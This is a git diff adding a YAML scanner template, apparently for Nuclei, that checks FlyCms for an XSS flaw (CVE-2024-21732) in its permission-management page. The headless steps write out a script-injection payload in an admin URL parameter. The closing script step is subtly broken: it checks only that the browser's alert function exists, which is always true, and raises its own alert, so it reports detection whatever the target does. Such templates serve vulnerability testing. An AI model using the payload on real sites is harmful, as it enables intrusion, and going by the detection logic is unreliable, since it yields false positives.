diff --git a/CVE-2024-21732.yaml b/CVE-2024-21732.yaml
new file mode 100644
index 00000000000..4da4a355139
--- /dev/null
+++ b/CVE-2024-21732.yaml
@@ -0,0 +1,42 @@
+id: CVE-2024-21732
+info:
+  name: FlyCms XSS via Permission Management (Headless)
+  author: ProjectDiscoveryAI
+  severity: medium
+  description: |
+    FlyCms through abbaa5a allows XSS via the permission management feature.
+  reference:
+    - https://github.com/Ghostfox2003/cms/blob/main/1.md
+  remediation: |
+    Ensure that all user inputs are properly sanitized and validated before being included in the web page. Implement proper escaping of special characters in HTML, JavaScript, and other contexts to prevent XSS. Keep the FlyCms software updated with the latest security patches.
+
+headless:
+  - steps:
+      - args:
+          url: "{{BaseURL}}/admin/permission-management?param=<script>alert(1)</script>"
+        action: navigate
+      - action: waitdialog
+        name: xss_alert
+        args:
+          max-duration: 5s  # Optional duration for dialog appearance
+      - action: script
+        args:
+          code: |
+            if (window.alert) {
+              alert("XSS Detected");
+              return true;
+            }
+            return false;
+        name: xss_detected
+
+
+
+
+
+
+
+
+
+
+
+